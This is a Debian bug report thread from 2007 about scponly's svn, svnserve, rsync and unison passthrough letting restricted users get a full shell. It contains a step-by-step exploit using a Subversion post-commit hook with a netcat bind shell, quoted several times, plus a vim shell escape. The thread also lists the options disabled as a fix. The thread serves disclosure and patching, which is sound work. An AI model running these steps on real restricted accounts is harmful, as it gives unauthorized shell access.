Debian Bug report logs - #437148
"svn", "svnserve", "unison", "rsync" passthrough is unsafe

version graph

Package: scponly; Maintainer for scponly is Thomas Wana <greuff@debian.org>;

Reported by: Joachim Breitner <nomeata@debian.org>

Date: Fri, 10 Aug 2007 17:57:01 UTC

Severity: grave

Tags: security

Found in version scponly/4.6-1

Fixed in versions scponly/4.6-1.1, scponly/4.6-1etch1, scponly/4.0-1sarge2

Done: Florian Weimer <fw@deneb.enyo.de>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, wheat@debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
New Bug report received and forwarded. Copy sent to wheat@debian.org, Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: submit@bugs.debian.org
Subject: Security Hole in scponly, due to svn support
Date: Fri, 10 Aug 2007 19:54:43 +0200
[Message part 1 (text/plain, inline)]
Package: scponly
Version: 4.6-1
X-Debbugs-CC: wheat@debian.org
Severity: grave
Tags: security

Hi Thomas Wana,

messing around with some friends here, I tried to access his computer
with only a scponly protected account. I discovered this way of gaining
full shell access:

I locally created a subversion repository /tmp/blubb with
a /tmp/blubb/hooks/post-commit that contains the command:
        ( nc -l -p 1042 -e /bin/bash) &
I copy this repositry using
        scp -r /tmp/blubb/ user@host:
Then I check out the repository remotely:
        ssh user@host /usr/bin/svn co file:///home/user/blubb bla
Now I add a file and commit it:
        touch blah
        scp blah user@host:bla/
        ssh user@host /usr/bin/svn ci bla
At this point, I have a vim instance running, asking me for the commit
message. I could now just run
        :!/bin/bash
to get a shell, but having done the post-commit hook already, I want to
use that, so I write something and quit the editor with :x

At this point, I can use
        nc host 1042
and I have a shell for the account that should have none.

The solution would be: Do not enable access to svn
(or svnserve), which is a simple compilation option. I’d appreciate it
if this gets fixed in debian etch.

I have sent this information to security@debian.org and scponly’s
upstream maintainer last week, but have not yet gotten a response.

Greetings,
Joachim


-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata

[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #10 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 12 Aug 2007 07:58:14 +0200
* Joachim Breitner:

> messing around with some friends here, I tried to access his computer
> with only a scponly protected account. I discovered this way of gaining
> full shell access:
>
> I locally created a subversion repository /tmp/blubb with
> a /tmp/blubb/hooks/post-commit that contains the command:
>         ( nc -l -p 1042 -e /bin/bash) &

This is an unfortunate interaction between scponly and Subversion, but
not a real bug in any of the programs.  The same problem arises when a
scponly-restricted user uploads any form of executable contents.  CGI
scripts are more common (and their so-called "PHP shells" which are
explicitly designed to exploit this).



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #15 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 12 Aug 2007 13:03:28 +0200
Hi,

Am Sonntag, den 12.08.2007, 07:58 +0200 schrieb Florian Weimer:
> * Joachim Breitner:
> 
> > messing around with some friends here, I tried to access his computer
> > with only a scponly protected account. I discovered this way of gaining
> > full shell access:
> >
> > I locally created a subversion repository /tmp/blubb with
> > a /tmp/blubb/hooks/post-commit that contains the command:
> >         ( nc -l -p 1042 -e /bin/bash) &
> 
> This is an unfortunate interaction between scponly and Subversion, but
> not a real bug in any of the programs.  The same problem arises when a
> scponly-restricted user uploads any form of executable contents.  CGI
> scripts are more common (and their so-called "PHP shells" which are
> explicitly designed to exploit this).

I think it’s more than that. If I upload some executable, I still have
to find a way to actually execute it (e.g. a badly configured web
server). Using subversion, I execute anything in _any case_, making
scponly useless for it’s purpose.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Thomas Wana <greuff@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #20 received at 437148@bugs.debian.org (full text, mbox):

From: Thomas Wana <greuff@debian.org>
To: Joachim Breitner <nomeata@debian.org>, 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 2 Sep 2007 17:49:15 +0200
Hi Joachim,

On 10.08.2007, at 19:54, Joachim Breitner wrote:

> Package: scponly
> Version: 4.6-1
> X-Debbugs-CC: wheat@debian.org
> Severity: grave
> Tags: security
>
> Hi Thomas Wana,
>
> messing around with some friends here, I tried to access his computer
> with only a scponly protected account. I discovered this way of  
> gaining
> full shell access:
>

Nice and creative way :-)
Can you please get in touch with the scponly-mailinglist,
this should be discussed there and fixed upstream.

Tom

> I locally created a subversion repository /tmp/blubb with
> a /tmp/blubb/hooks/post-commit that contains the command:
>         ( nc -l -p 1042 -e /bin/bash) &
> I copy this repositry using
>         scp -r /tmp/blubb/ user@host:
> Then I check out the repository remotely:
>         ssh user@host /usr/bin/svn co file:///home/user/blubb bla
> Now I add a file and commit it:
>         touch blah
>         scp blah user@host:bla/
>         ssh user@host /usr/bin/svn ci bla
> At this point, I have a vim instance running, asking me for the commit
> message. I could now just run
>         :!/bin/bash
> to get a shell, but having done the post-commit hook already, I  
> want to
> use that, so I write something and quit the editor with :x
>
> At this point, I can use
>         nc host 1042
> and I have a shell for the account that should have none.
>
> The solution would be: Do not enable access to svn
> (or svnserve), which is a simple compilation option. I’d appreciate it
> if this gets fixed in debian etch.
>
> I have sent this information to security@debian.org and scponly’s
> upstream maintainer last week, but have not yet gotten a response.
>
> Greetings,
> Joachim
>
>
> -- 
> Joachim "nomeata" Breitner
> Debian Developer
>   nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
>   JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata
>




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #25 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 18:29:15 +0200
* Joachim Breitner:

>> This is an unfortunate interaction between scponly and Subversion, but
>> not a real bug in any of the programs.  The same problem arises when a
>> scponly-restricted user uploads any form of executable contents.  CGI
>> scripts are more common (and their so-called "PHP shells" which are
>> explicitly designed to exploit this).
>
> I think it’s more than that. If I upload some executable, I still have
> to find a way to actually execute it (e.g. a badly configured web
> server). Using subversion, I execute anything in _any case_, making
> scponly useless for it’s purpose.

You need write permission on the Subversion repository.  I think it's
pretty obvious that you can change the Subversion hook scripts once
you've got them.

There are tons of programs which will lead to a similar
situation--basically anything that reads a user-specific
configuration file.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #30 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:25:05 +0200
Hi,

Am Sonntag, den 02.09.2007, 18:29 +0200 schrieb Florian Weimer:
> * Joachim Breitner:
> 
> >> This is an unfortunate interaction between scponly and Subversion, but
> >> not a real bug in any of the programs.  The same problem arises when a
> >> scponly-restricted user uploads any form of executable contents.  CGI
> >> scripts are more common (and their so-called "PHP shells" which are
> >> explicitly designed to exploit this).
> >
> > I think it’s more than that. If I upload some executable, I still have
> > to find a way to actually execute it (e.g. a badly configured web
> > server). Using subversion, I execute anything in _any case_, making
> > scponly useless for it’s purpose.
> 
> You need write permission on the Subversion repository.  I think it's
> pretty obvious that you can change the Subversion hook scripts once
> you've got them.
> 
> There are tons of programs which will lead to a similar
> situation--basically anything that reads a user-specific
> configuration file.

Note that every user can create a subversion repository.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #35 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:27:59 +0200
* Joachim Breitner:

>> You need write permission on the Subversion repository.  I think it's
>> pretty obvious that you can change the Subversion hook scripts once
>> you've got them.
>> 
>> There are tons of programs which will lead to a similar
>> situation--basically anything that reads a user-specific
>> configuration file.
>
> Note that every user can create a subversion repository.

So what?  You still need a second channel to access that repository
using the Subversion protocol.  scponly access alone is not
sufficient.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #40 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:30:09 +0200
Hi,

Am Sonntag, den 02.09.2007, 20:27 +0200 schrieb Florian Weimer:
> * Joachim Breitner:
> 
> >> You need write permission on the Subversion repository.  I think it's
> >> pretty obvious that you can change the Subversion hook scripts once
> >> you've got them.
> >> 
> >> There are tons of programs which will lead to a similar
> >> situation--basically anything that reads a user-specific
> >> configuration file.
> >
> > Note that every user can create a subversion repository.
> 
> So what?  You still need a second channel to access that repository
> using the Subversion protocol.  scponly access alone is not
> sufficient.

It is, as you can run “svn” in the scponly shell, in Debian’s current
configuration. If in doubt, please re-try the steps I took in the
original report.

Greetings,
Joachim
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Thomas Wana <greuff@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #45 received at 437148@bugs.debian.org (full text, mbox):

From: Thomas Wana <greuff@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>, 437148@bugs.debian.org
Cc: Joachim Breitner <nomeata@debian.org>
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 2 Sep 2007 20:30:58 +0200
On 02.09.2007, at 18:29, Florian Weimer wrote:

> * Joachim Breitner:
>
>>> This is an unfortunate interaction between scponly and  
>>> Subversion, but
>>> not a real bug in any of the programs.  The same problem arises  
>>> when a
>>> scponly-restricted user uploads any form of executable contents.   
>>> CGI
>>> scripts are more common (and their so-called "PHP shells" which are
>>> explicitly designed to exploit this).
>>
>> I think it’s more than that. If I upload some executable, I still  
>> have
>> to find a way to actually execute it (e.g. a badly configured web
>> server). Using subversion, I execute anything in _any case_, making
>> scponly useless for it’s purpose.
>
> You need write permission on the Subversion repository.  I think it's
> pretty obvious that you can change the Subversion hook scripts once
> you've got them.

But you can upload a private repository, trigger the hook
and remove it afterwards.

I believe this is a real security problem, and I'm not
quite sure how to fix this without disabling subversion
support. But granted, I wouldn't call it a bug, too.
It's no flaw in any of the programs involved, rather it
is a constellation noone thought of before.

>
> There are tons of programs which will lead to a similar
> situation--basically anything that reads a user-specific
> configuration file.

Well, reading a file is harmless compared to running
arbitrary scripts.

Tom

>
>




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #50 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 20:49:31 +0200
retitle 437148 "svn", "svnserve" command passthrough is unsafe
thanks

* Joachim Breitner:

>> So what?  You still need a second channel to access that repository
>> using the Subversion protocol.  scponly access alone is not
>> sufficient.
>
> It is, as you can run “svn” in the scponly shell, in Debian’s current
> configuration. If in doubt, please re-try the steps I took in the
> original report.

Ah, I see.  Passing through plain "svn" commands is a really, really
stupid thing to do.  I couldn't image that scponly doing this.

Other holes introducd by "svn" pass-through:

  svn checkout (write arbitrary files)
  svn diff --diff-cmd (arbitrary command execution)
  svn export (write arbitrary files)
  svn propedit --editor-cmd (arbitrary command execution)

And likely a few more.

Your example shows that "svnserve" isn't safe, either.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #55 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org, control@bugs.debian.org
Subject: Re: Bug#437148: Security Hole in scponly, due to svn support
Date: Sun, 02 Sep 2007 21:31:09 +0200
* Florian Weimer:
retitle 437148 "svn", "svnserve", "unison", "rsync" passthrough is unsafe
thanks

>   svn checkout (write arbitrary files)
>   svn export (write arbitrary files)

These two are non-issues because scponly relies on UNIX permissions to
restrict write access.

> Your example shows that "svnserve" isn't safe, either.

Similar tricks can be played with rsync (create an rsyncd.conf with a
pre-xfer exec or post-xfer exec option; start a daemon, and connect to
it) and unison (provided that you can create files in ~/.unison, which
is quite likely).



Changed Bug title to `"svn", "svnserve", "unison", "rsync" passthrough is unsafe' from `Security Hole in scponly, due to svn support'. Request was from Florian Weimer <fw@deneb.enyo.de> to control@bugs.debian.org. (Sun, 02 Sep 2007 19:33:05 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #62 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: scponly@lists.ccs.neu.edu
Cc: wby oblyr <joe@sublimation.org>, 437148@bugs.debian.org
Subject: Re: [scponly] svn support in scponly is unsafe
Date: Tue, 04 Sep 2007 20:23:11 +0000
Hi,

Am Dienstag, den 04.09.2007, 13:10 -0700 schrieb Kaleb Pederson:
> Yes, you are exactly right.  This was discovered a while ago and documented in 
> our SECURITY document currently only in CVS.  You can see it here:
> 
> http://scponly.cvs.sourceforge.net/scponly/scponly/SECURITY?revision=1.1&view=markup
> 
> We have debated whether or not support for svn and svnserve should be removed 
> entirely or if it should be controllable by the system administrator.  As the 
> OS can be configured to safely allow svn/svnserve, I think we leaned towards 
> making it obvious what the ramifications of the different options are and 
> leaving it up to the discretion of the system administrator.  For instances 
> where the svn repository is actually controlled by the administrator, this 
> makes perfect sense.
> 
> Please forgive us that this wasn't brought to the attention of the community 
> earlier, unfortunately our time limits us more than we like.
> 
> Community members, please let us know what your feelings on this are so that 
> we have as few surprises as possible with our next release.

I assume then that svn/svnserve support is by default off in the
original package and that the Debian package should also not have
svn/svnserve support.

Greetings,
Joachim
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #67 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org
Subject: Re: [scponly] svn support in scponly is unsafe
Date: Tue, 04 Sep 2007 20:41:02 +0000
Hi Kaleb,

just replying to get the mail into the Debian BTS. Please keep
437148@bugs.debian.org in the CC about this topic.

I’m not testing these now, but maybe the scponly package maintainer
will.

Greetings,
Joachim

Am Dienstag, den 04.09.2007, 13:38 -0700 schrieb Kaleb Pederson:
> Hello,
> 
> If you are familiar with rsync and unison and use them with scponly, please 
> take a look at the comments at the bottom of the bug report and test with the 
> latest CVS -- specifically options that use configuration files that can't be 
> identified on the command line.  I had trouble finding adequate documentation 
> on unison, so testing in that area is appreciated.
> 
> Aside from specifying which commands might have the right to execute by using 
> an LD_PRELOAD mechanism, I'm not sure if there is much that can be done.
> 
> We have fairly recently refined the rsync support to disallow starting it as a 
> daemon, and a few other things that could also cause problems, so I believe 
> it won't accept a config file on the command line, etc., and I believe it to 
> be safe at this point.
> 
> Furthermore, in light of comments on the debian list, I just 
> disallowed --editor-cmd, --diff-cmd, and --config-dir... but that still 
> doesn't help with the editor cmd and diff cmd being specified in config 
> files.
> 
> As far as we know, a system secured using the practices set forth in the 
> security guide will be secure.  If there are other best practices that can be 
> added to it, or you have other suggestions and/or comments, please let us 
> know.
> 
> Thanks.
> 
> --Kaleb
> 
> On Tuesday 04 September 2007, Joachim Breitner wrote:
> > Hi,
> >
> > please read through:
> > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=437148
> >
> > Basically: Allowing svn or svnserve is unsafe.
> >
> > Greetings,
> > Joachim
> 
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #72 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: 437148@bugs.debian.org, Kaleb Pederson <kibab@icehouse.net>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Thu, 06 Sep 2007 19:51:22 +0200
>> Furthermore, in light of comments on the debian list, I just 
>> disallowed --editor-cmd, --diff-cmd, and --config-dir... but that still 
>> doesn't help with the editor cmd and diff cmd being specified in config 
>> files.

--diff3-cmd is problematic, too.  For rsync, you need to disable
daemon mode (at the very least).

The security guide must mention that you need to lock down
~/.subversion, ~/.ssh, ~/.unison and maybe a few more directories.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Kaleb Pederson <kibab@icehouse.net>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #77 received at 437148@bugs.debian.org (full text, mbox):

From: Kaleb Pederson <kibab@icehouse.net>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: Joachim Breitner <nomeata@debian.org>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 7 Sep 2007 00:45:50 -0700
[Message part 1 (text/plain, inline)]
Thanks Florian,

The following are now disabled for svn:

"editor-cmd",
"diff-cmd",
"diff3-cmd", (just added)
"config-dir",

The following are disabled for svnserve:

"daemon",
"listen-port",
"listen-host",
"foreground",
"inetd",
"threads",
"listen-once",

The following for rsync:

"rsh",
"daemon",
"rsync-path", (this and below just added)
"address",
"port",
"sockopts",
"config",
"no-detach",

And the following for unison:

"-rshcmd",
"-sshcmd",
"-servercmd",
"-addversionno" (just added)

Where documented, the respective short options for the above are disabled.  I 
updated the security document to include the changes you recommend, and then 
a couple of others that come to mind.  The latest version of the security 
document is available here:

http://scponly.cvs.sourceforge.net/scponly/scponly/SECURITY?view=markup

We'll continue to look at it and see if there is anything else that we missed.  
Thanks again for the help.

--Kaleb

On Thursday 06 September 2007, Florian Weimer wrote:
> >> Furthermore, in light of comments on the debian list, I just
> >> disallowed --editor-cmd, --diff-cmd, and --config-dir... but that still
> >> doesn't help with the editor cmd and diff cmd being specified in config
> >> files.
>
> --diff3-cmd is problematic, too.  For rsync, you need to disable
> daemon mode (at the very least).
>
> The security guide must mention that you need to lock down
> ~/.subversion, ~/.ssh, ~/.unison and maybe a few more directories.


[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #82 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Kaleb Pederson <kibab@icehouse.net>
Cc: Florian Weimer <fw@deneb.enyo.de>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:31:13 +0200
Hi,

Am Freitag, den 07.09.2007, 00:45 -0700 schrieb Kaleb Pederson:
> Thanks Florian,
> 
> The following are now disabled for svn:
> 
> "editor-cmd",
> "diff-cmd",
> "diff3-cmd", (just added)
> "config-dir",

But that does not prevent commiting to a repository with hooks, right?
You write in the security docs:

> These files have specific filenames at specific locations relative to
> the svn repository root.

But since I can put a repository _anywhere_ by just copying it there,
how do you want the admin to prevent the user running it’s hook
commands?

Greetings,
Joachim
-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #87 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:49:29 +0200
* Joachim Breitner:

>> These files have specific filenames at specific locations relative to
>> the svn repository root.
>
> But since I can put a repository _anywhere_ by just copying it there,
> how do you want the admin to prevent the user running it’s hook
> commands?

I think mounting the file system no-exec covers that.  IIRC,
Subversion directly executes the hook scripts, and this will fail in
that case.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #92 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:56:11 +0200
Am Freitag, den 07.09.2007, 10:49 +0200 schrieb Florian Weimer:
> * Joachim Breitner:
> 
> >> These files have specific filenames at specific locations relative to
> >> the svn repository root.
> >
> > But since I can put a repository _anywhere_ by just copying it there,
> > how do you want the admin to prevent the user running it’s hook
> > commands?
> 
> I think mounting the file system no-exec covers that.  IIRC,
> Subversion directly executes the hook scripts, and this will fail in
> that case.

Then this should be mentioned in the file. I also think that this is
quite a high hurdle: Admins that want that can surely re-compile
scponly. For the rest, the debian package should come without svn
support. The README.Debian could describe the disabled features, and
under what circumstances they are save, and how best to recompile
scponly.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #97 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Joachim Breitner <nomeata@debian.org>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 10:59:07 +0200
* Joachim Breitner:

>> I think mounting the file system no-exec covers that.  IIRC,
>> Subversion directly executes the hook scripts, and this will fail in
>> that case.
>
> Then this should be mentioned in the file. I also think that this is
> quite a high hurdle: Admins that want that can surely re-compile
> scponly.

It's mentioned in the file (item 7), but I agree that this is not the
target group of the Debian package.

> For the rest, the debian package should come without svn
> support. The README.Debian could describe the disabled features, and
> under what circumstances they are save, and how best to recompile
> scponly.

The package could create two binaries, one that supports just
scp/sftp, and another one for the rest.

For the stable security update, it's probably best to just disable
Subversion/Unison/rsync.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #102 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 11:01:23 +0200
Hi,

Am Freitag, den 07.09.2007, 10:59 +0200 schrieb Florian Weimer:
> * Joachim Breitner:
> >> I think mounting the file system no-exec covers that.  IIRC,
> >> Subversion directly executes the hook scripts, and this will fail in
> >> that case.
> >
> > Then this should be mentioned in the file. I also think that this is
> > quite a high hurdle: Admins that want that can surely re-compile
> > scponly.
> 
> It's mentioned in the file (item 7), but I agree that this is not the
> target group of the Debian package.

Sorry, didn’t read it all.

> > For the rest, the debian package should come without svn
> > support. The README.Debian could describe the disabled features, and
> > under what circumstances they are save, and how best to recompile
> > scponly.
> 
> The package could create two binaries, one that supports just
> scp/sftp, and another one for the rest.

Sounds good, but that’s up to the maintainer. Thomas, are you reading
this?

> For the stable security update, it's probably best to just disable
> Subversion/Unison/rsync.

I agree.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org:
